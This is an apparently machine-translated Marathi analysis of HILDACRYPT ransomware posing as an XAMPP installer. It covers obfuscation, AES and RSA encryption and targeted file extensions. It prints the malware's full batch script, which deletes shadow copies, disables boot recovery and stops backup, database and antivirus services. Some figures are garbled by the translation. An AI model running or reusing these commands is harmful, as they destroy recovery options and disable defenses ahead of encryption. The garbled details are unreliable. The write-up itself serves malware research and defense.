рд╣реЕрд▓реЛ, рд╣реЕрдмреНрд░! рдкреБрдиреНрд╣рд╛ рдПрдХрджрд╛, рдЖрдореНрд╣реА рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рд╢реНрд░реЗрдгреАрддреАрд▓ рдорд╛рд▓рд╡реЗрдЕрд░рдЪреНрдпрд╛ рдирд╡реАрдирддрдо рдЖрд╡реГрддреНрддреНрдпрд╛рдВрдмрджреНрджрд▓ рдмреЛрд▓рдд рдЖрд╣реЛрдд. HILDACRYPT рд╣реЗ рдирд╡реАрди рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдЖрд╣реЗ, рд╣реЗ Hilda рдХреБрдЯреБрдВрдмрд╛рддреАрд▓ рдПрдХ рд╕рджрд╕реНрдп рдЖрд╣реЗ, рдЬреЛ рдСрдЧрд╕реНрдЯ 2019 рдордзреНрдпреЗ рд╕рд╛рдкрдбрд▓рд╛ рд╣реЛрддрд╛, рдЬреНрдпрд╛рдЪреЗ рдирд╛рд╡ рд╕реЙрдлреНрдЯрд╡реЗрдЕрд░ рд╡рд┐рддрд░рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рд╡рд╛рдкрд░рд▓реНрдпрд╛ рдЧреЗрд▓реЗрд▓реНрдпрд╛ Netflix рдХрд╛рд░реНрдЯреВрдирдЪреНрдпрд╛ рдирд╛рд╡рд╛рд╡рд░ рдЖрд╣реЗ. рдЖрдЬ рдЖрдкрдг рдпрд╛ рдЕрдкрдбреЗрдЯреЗрдб рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рд╡реНрд╣рд╛рдпрд░рд╕рдЪреНрдпрд╛ рддрд╛рдВрддреНрд░рд┐рдХ рд╡реИрд╢рд┐рд╖реНрдЯреНрдпрд╛рдВрдЪреА рдУрд│рдЦ рдХрд░реВрди рдШреЗрдд рдЖрд╣реЛрдд.
Hilda ransomware рдЪреНрдпрд╛ рдкрд╣рд┐рд▓реНрдпрд╛ рдЖрд╡реГрддреНрддреАрдордзреНрдпреЗ, Youtube рд╡рд░ рдкреЛрд╕реНрдЯ рдХреЗрд▓реЗрд▓реНрдпрд╛ рдПрдХрд╛рдЪреА рд▓рд┐рдВрдХ рдЦрдВрдбрдгреАрдЪреНрдпрд╛ рдкрддреНрд░рд╛рдд рдХрд╛рд░реНрдЯреВрди рдорд╛рд▓рд┐рдХрд╛ рд╣реЛрддреА. HILDACRYPT рдПрдХ рд╡реИрдз XAMPP рдЗрдВрд╕реНрдЯреЙрд▓рд░ рдореНрд╣рдгреВрди рдорд╛рд╕реНрдХрд░реЗрдб рдХрд░рддреЗ, рдПрдХ рд╕реБрд▓рдн-рд╕реНрдерд╛рдкрд┐рдд Apache рд╡рд┐рддрд░рдг рдЬреНрдпрд╛рдордзреНрдпреЗ MariaDB, PHP рдЖрдгрд┐ Perl рд╕рдорд╛рд╡рд┐рд╖реНрдЯ рдЖрд╣реЗ. рддреНрдпрд╛рдЪ рд╡реЗрд│реА, рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЙрдХрд░рдЪреЗ рд╡реЗрдЧрд│реЗ рдлрд╛рдЗрд▓ рдирд╛рд╡ рдЖрд╣реЗ - xamp. рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдлрд╛рдЗрд▓рдордзреНрдпреЗ рдЗрд▓реЗрдХреНрдЯреНрд░реЙрдирд┐рдХ рд╕реНрд╡рд╛рдХреНрд╖рд░реА рдирд╕рддреЗ.
рд╕реНрдерд┐рд░ рд╡рд┐рд╢реНрд▓реЗрд╖рдг
рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ MS Windows рд╕рд╛рдареА рд▓рд┐рд╣рд┐рд▓реЗрд▓реНрдпрд╛ PE32 .NET рдлрд╛рдЗрд▓рдордзреНрдпреЗ рдЖрд╣реЗ. рддреНрдпрд╛рдЪрд╛ рдЖрдХрд╛рд░ 135 рдмрд╛рдЗрдЯреНрд╕ рдЖрд╣реЗ. рдореБрдЦреНрдп рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЛрдб рдЖрдгрд┐ рдбрд┐рдлреЗрдВрдбрд░ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЛрдб рджреЛрдиреНрд╣реА C# рдордзреНрдпреЗ рд▓рд┐рд╣рд┐рд▓реЗрд▓реЗ рдЖрд╣реЗрдд. рд╕рдВрдХрд▓рди рддрд╛рд░реАрдЦ рдЖрдгрд┐ рдЯрд╛рдЗрдо рд╕реНрдЯреЕрдореНрдкрдиреБрд╕рд╛рд░, рдмрд╛рдпрдирд░реА 168 рд╕рдкреНрдЯреЗрдВрдмрд░ 14 рд░реЛрдЬреА рддрдпрд╛рд░ рдХреЗрд▓реА рдЧреЗрд▓реА.
Detect It Easy рдиреБрд╕рд╛рд░, ransomware рд╣реЗ Confuser рдЖрдгрд┐ ConfuserEx рд╡рд╛рдкрд░реВрди рд╕рдВрдЧреНрд░рд╣рд┐рдд рдХреЗрд▓реЗ рдЖрд╣реЗ, рдкрд░рдВрддреБ рд╣реЗ obfuscators рдкреВрд░реНрд╡реАрд╕рд╛рд░рдЦреЗрдЪ рдЖрд╣реЗрдд, рдлрдХреНрдд ConfuserEx рд╣реЗ Confuser рдЪреЗ рдЙрддреНрддрд░рд╛рдзрд┐рдХрд╛рд░реА рдЖрд╣реЗрдд, рддреНрдпрд╛рдореБрд│реЗ рддреНрдпрд╛рдВрдЪреНрдпрд╛ рдХреЛрдб рд╕реНрд╡рд╛рдХреНрд╖рд░реА рд╕рдорд╛рди рдЖрд╣реЗрдд.
HILDACRYPT рдЦрд░рдВрдЪ ConfuserEx рд╕рд╣ рдкреЕрдХреЗрдЬ рдХреЗрд▓реЗрд▓реЗ рдЖрд╣реЗ.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
рд╣рд▓реНрд▓рд╛ рд╡реЗрдХреНрдЯрд░
рдмрд╣реБрдзрд╛, рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдПрдХрд╛ рд╡реЗрдм рдкреНрд░реЛрдЧреНрд░рд╛рдорд┐рдВрдЧ рд╕рд╛рдЗрдЯрд╡рд░ рд╕рд╛рдкрдбрд▓рд╛ рд╣реЛрддрд╛, рдЬреЛ рд╡реИрдз XAMPP рдкреНрд░реЛрдЧреНрд░рд╛рдо рдореНрд╣рдгреВрди рдореБрдЦрд╡рдЯрд╛ рдШрд╛рддрд▓рд╛ рд╣реЛрддрд╛.
рд╕рдВрд╕рд░реНрдЧрд╛рдЪреА рд╕рдВрдкреВрд░реНрдг рд╕рд╛рдЦрд│реА рджрд┐рд╕реВрди рдпреЗрддреЗ .
рдЧреЛрдВрдзрд│
рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рд╕реНрдЯреНрд░рд┐рдВрдЧреНрд╕ рдПрдирдХреНрд░рд┐рдкреНрдЯреЗрдб рд╕реНрд╡рд░реВрдкрд╛рдд рд╕рд╛рдард╡рд▓реНрдпрд╛ рдЬрд╛рддрд╛рдд. рд▓рд╛рдБрдЪ рдХреЗрд▓реНрдпрд╛рд╡рд░, HILDACRYPT рддреНрдпрд╛рдВрдирд╛ Base64 рдЖрдгрд┐ AES-256-CBC рд╡рд╛рдкрд░реВрди рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рддреЗ.
рд╕реЗрдЯрд┐рдВрдЧ
рд╕рд░реНрд╡ рдкреНрд░рдердо, рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ %AppDataRoaming% рдордзреНрдпреЗ рдПрдХ рдлреЛрд▓реНрдбрд░ рддрдпрд╛рд░ рдХрд░рддреЗ рдЬреНрдпрд╛рдордзреНрдпреЗ GUID (рдЧреНрд▓реЛрдмреЕрд▓реА рдпреБрдирд┐рдХ рдЖрдпрдбреЗрдВрдЯрд┐рдлрд╛рдпрд░) рдкреЕрд░рд╛рдореАрдЯрд░ рдпрд╛рджреГрдЪреНрдЫрд┐рдХрдкрдгреЗ рддрдпрд╛рд░ рдХреЗрд▓рд╛ рдЬрд╛рддреЛ. рдпрд╛ рд╕реНрдерд╛рдирд╛рд╡рд░ рдмреЕрдЯ рдлрд╛рдЗрд▓ рдЬреЛрдбреВрди, тАЛтАЛрд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рд╡реНрд╣рд╛рдпрд░рд╕ cmd.exe рд╡рд╛рдкрд░реВрди рд▓реЙрдиреНрдЪ рдХрд░рддреЛ:
cmd.exe /c JKfgkgj3hjgfhjka.bat рдЖрдгрд┐ рдмрд╛рд╣реЗрд░ рдкрдбрд╛
рддреЗ рдирдВрддрд░ рд╕рд┐рд╕реНрдЯрдо рд╡реИрд╢рд┐рд╖реНрдЯреНрдпреЗ рдХрд┐рдВрд╡рд╛ рд╕реЗрд╡рд╛ рдЕрдХреНрд╖рдо рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдмреЕрдЪ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕ рдкреНрд░рд╛рд░рдВрдн рдХрд░рддреЗ.
рд╕реНрдХреНрд░рд┐рдкреНрдЯрдордзреНрдпреЗ рдХрдорд╛рдВрдбреНрд╕рдЪреА рдПрдХ рд▓рд╛рдВрдмрд▓рдЪрдХ рдпрд╛рджреА рдЖрд╣реЗ рдЬреА рд╕рд╛рд╡рд▓реАрдЪреНрдпрд╛ рдкреНрд░рддреА рдирд╖реНрдЯ рдХрд░рддрд╛рдд, SQL рд╕рд░реНрд╡реНрд╣рд░ рдЕрдХреНрд╖рдо рдХрд░рддрд╛рдд, рдмреЕрдХрдЕрдк рдЖрдгрд┐ рдЕрдБрдЯреАрд╡реНрд╣рд╛рдпрд░рд╕ рдЙрдкрд╛рдп.
рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, рддреЗ Acronis рдмреЕрдХрдЕрдк рд╕реЗрд╡рд╛ рдерд╛рдВрдмрд╡рдгреНрдпрд╛рдЪрд╛ рдЕрдпрд╢рд╕реНрд╡реА рдкреНрд░рдпрддреНрди рдХрд░рддреЗ. рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рддреЗ рдЦрд╛рд▓реАрд▓ рд╡рд┐рдХреНрд░реЗрддреНрдпрд╛рдВрдХрдбреВрди рдмреЕрдХрдЕрдк рд╕рд┐рд╕реНрдЯрдо рдЖрдгрд┐ рдЕрдБрдЯреАрд╡реНрд╣рд╛рдпрд░рд╕ рд╕реЛрд▓реНрдпреВрд╢рдиреНрд╕рд╡рд░ рд╣рд▓реНрд▓рд╛ рдХрд░рддреЗ: Veeam, Sophos, Kaspersky, McAfee рдЖрдгрд┐ рдЗрддрд░.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop тАЬSophos Device Control ServiceтАЭ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop тАЬZoolz 2 ServiceтАЭ /y
net stop McTaskManager /y
net stop тАЬSophos AutoUpdate ServiceтАЭ /y
net stop тАЬSophos System Protection ServiceтАЭ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop тАЬSymantec System RecoveryтАЭ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop тАЬSophos Health ServiceтАЭ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop тАЬSophos Message RouterтАЭ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop тАЬSophos Clean ServiceтАЭ /y
net stop swi_update_64 /y
net stop тАЬSophos Web Control ServiceтАЭ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop тАЬVeeam Backup Catalog Data ServiceтАЭ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop тАЬSophos MCS ClientтАЭ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop тАЬSQLsafe Backup ServiceтАЭ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop тАЬSophos Safestore ServiceтАЭ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop тАЬSophos File Scanner ServiceтАЭ /y
net stop тАЬSophos AgentтАЭ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop тАЬEnterprise Client ServiceтАЭ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop тАЬSQL BackupsтАЭ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop тАЬSophos MCS AgentтАЭ /y
net stop RESvc /y
net stop тАЬAcronis VSS ProviderтАЭ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop тАЬSQLsafe Filter ServiceтАЭ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
рд╡рд░ рдирдореВрдж рдХреЗрд▓реЗрд▓реНрдпрд╛ рд╕реЗрд╡рд╛ рдЖрдгрд┐ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЕрдХреНрд╖рдо рдХреЗрд▓реНтАНрдпрд╛рд╡рд░, рд╕рд░реНрд╡ рдЖрд╡рд╢реНтАНрдпрдХ рд╕реЗрд╡рд╛ рдмрдВрдж рдЕрд╕рд▓реНтАНрдпрд╛рдЪреА рдЦрд╛рддреНрд░реА рдХрд░рдгреНтАНрдпрд╛рд╕рд╛рдареА рдХреНрд░рд┐рдкреНтАНрдЯреЛрд▓реЙрдХрд░ рдЯрд╛рд╕реНтАНрдХрд▓рд┐рд╕реНрдЯ рдХрдорд╛рдВрдб рд╡рд╛рдкрд░реВрди рд╕рд░реНрд╡ рдЪрд╛рд▓реВ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдВрдмрджреНрджрд▓ рдорд╛рд╣рд┐рддреА рдЧреЛрд│рд╛ рдХрд░рддреЛ.
рдЯрд╛рд╕реНрдХрд▓рд┐рд╕реНрдЯ v/fo csv
рд╣реА рдХрдорд╛рдВрдб рдЪрд╛рд▓реВ рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдВрдЪреА рддрдкрд╢реАрд▓рд╡рд╛рд░ рд╕реВрдЪреА рджрд╛рдЦрд╡рддреЗ, рдЬреНрдпрд╛рдЪреЗ рдШрдЯрдХ тАЬ,тАЭ рдЪрд┐рдиреНрд╣рд╛рдиреЗ рд╡реЗрдЧрд│реЗ рдХреЗрд▓реЗ рдЬрд╛рддрд╛рдд.
┬л┬лcsrss.exe┬╗,┬л448┬╗,┬лservices┬╗,┬л0┬╗,┬л1я┐╜896 я┐╜я┐╜┬╗,┬лunknown┬╗,┬╗я┐╜/я┐╜┬╗,┬л0:00:03┬╗,┬╗я┐╜/я┐╜┬╗┬╗
рдпрд╛ рддрдкрд╛рд╕рдгреАрдирдВрддрд░, рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдПрдирдХреНрд░рд┐рдкреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реБрд░реВ рдХрд░рддреЗ.
рдХреВрдЯрдмрджреНрдзреАрдХрд░рдг
рдлрд╛рдЗрд▓ рдПрдирдХреНрд░рд┐рдкреНрд╢рди
HILDACRYPT рд░реАрд╕рд╛рдпрдХрд▓.рдмрд┐рди рдЖрдгрд┐ рд╕рдВрджрд░реНрдн рдЕрд╕реЗрдВрдмрд▓реА рдорд╛рдпрдХреНрд░реЛрд╕реЙрдлреНрдЯ рдлреЛрд▓реНрдбрд░реНрд╕ рд╡рдЧрд│рддрд╛ рд╣рд╛рд░реНрдб рдбреНрд░рд╛рдЗрд╡реНрд╣рдЪреНрдпрд╛ рд╕рд░реНрд╡ рд╕рд╛рдкрдбрд▓реЗрд▓реНрдпрд╛ рд╕рд╛рдордЧреНрд░реАрдордзреВрди рдЬрд╛рддреЗ. рдЙрддреНрддрд░рд╛рд░реНрдзрд╛рдд .Net рдНрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕рд╕рд╛рдареА рдЧрдВрднреАрд░ dll, pdb, рдЗрддреНрдпрд╛рджрд┐ рдлрд╛рдпрд▓реА рдЖрд╣реЗрдд рдЬреНрдпрд╛ ransomware рдЪреНрдпрд╛ рдСрдкрд░реЗрд╢рдирд╡рд░ рдкрд░рд┐рдгрд╛рдо рдХрд░реВ рд╢рдХрддрд╛рдд. рдХреВрдЯрдмрджреНрдз рдХреЗрд▓реЗрд▓реНрдпрд╛ рдлрд╛рдЗрд▓реНрд╕ рд╢реЛрдзрдгреНрдпрд╛рд╕рд╛рдареА, рд╡рд┐рд╕реНрддрд╛рд░рд╛рдВрдЪреА рдЦрд╛рд▓реАрд▓ рд╕реВрдЪреА рд╡рд╛рдкрд░рд▓реА рдЬрд╛рддреЗ:
┬л.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md┬╗
рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдЪреНрдпрд╛ рдлрд╛рдЗрд▓реНрд╕ рдПрдирдХреНрд░рд┐рдкреНрдЯ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА AES-256-CBC рдЕрд▓реНрдЧреЛрд░рд┐рджрдо рд╡рд╛рдкрд░рддреЗ. рдХреА рдЖрдХрд╛рд░ 256 рдмрд┐рдЯ рдЖрд╣реЗ рдЖрдгрд┐ рдЗрдирд┐рд╢рд┐рдПрд▓рд╛рдпрдЭреЗрд╢рди рд╡реЗрдХреНрдЯрд░ (IV) рдЖрдХрд╛рд░ 16 рдмрд╛рдЗрдЯреНрд╕ рдЖрд╣реЗ.
рдЦрд╛рд▓реАрд▓ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯрдордзреНрдпреЗ, byte_2 рдЖрдгрд┐ byte_1 рдЪреА рдореВрд▓реНрдпреЗ GetBytes() рд╡рд╛рдкрд░реВрди рдпрд╛рджреГрдЪреНрдЫрд┐рдХрдкрдгреЗ рдкреНрд░рд╛рдкреНрдд рдХреЗрд▓реА рдЧреЗрд▓реА.
рдХреА
╨Т╨Ш
рдПрдирдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдордзреНрдпреЗ HCY рд╡рд┐рд╕реНрддрд╛рд░ рдЖрд╣реЗ!.. рд╣реЗ рдПрдирдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдЪреЗ рдЙрджрд╛рд╣рд░рдг рдЖрд╣реЗ. рдпрд╛ рдлрд╛рдИрд▓рд╕рд╛рдареА рд╡рд░ рдирдореВрдж рдХреЗрд▓реЗрд▓реА рдХреА рдЖрдгрд┐ IV рддрдпрд╛рд░ рдХреЗрд▓реА рд╣реЛрддреА.
рдХреА рдПрдирдХреНрд░рд┐рдкреНрд╢рди
рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЙрдХрд░ рд╡реНрдпреБрддреНрдкрдиреНрди рдХреЗрд▓реЗрд▓реА AES рдХреА рдПрдХрд╛ рдПрдирдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдордзреНрдпреЗ рд╕рдВрдЧреНрд░рд╣рд┐рдд рдХрд░рддреЛ. рдПрдирдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдЪреНрдпрд╛ рдкрд╣рд┐рд▓реНрдпрд╛ рднрд╛рдЧрд╛рдд рд╣реЗрдбрд░ рдЖрд╣реЗ рдЬреНрдпрд╛рдордзреНрдпреЗ XML рдлреЙрд░рдореЕрдЯрдордзреНрдпреЗ HILDACRYPT, KEY, IV, FileLen рд╕рд╛рд░рдЦрд╛ рдбреЗрдЯрд╛ рдЖрд╣реЗ рдЖрдгрд┐ рддреЗ рдЕрд╕реЗ рджрд┐рд╕рддреЗ:
AES рдЖрдгрд┐ IV рдХреА рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди RSA-2048 рд╡рд╛рдкрд░реВрди рдХреЗрд▓реЗ рдЬрд╛рддреЗ рдЖрдгрд┐ рдПрдиреНрдХреЛрдбрд┐рдВрдЧ рдмреЗрд╕64 рд╡рд╛рдкрд░реВрди рдХреЗрд▓реЗ рдЬрд╛рддреЗ. RSA рдкрдмреНрд▓рд┐рдХ рдХреА XML рдлреЙрд░рдореЕрдЯрдордзреАрд▓ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╕реНрдЯреНрд░рд┐рдВрдЧрдкреИрдХреА рдПрдХрд╛рдордзреНрдпреЗ рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЙрдХрд░рдЪреНрдпрд╛ рдореБрдЦреНрдп рднрд╛рдЧрд╛рдордзреНрдпреЗ рд╕рдВрдЧреНрд░рд╣рд┐рдд рдХреЗрд▓реА рдЬрд╛рддреЗ.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
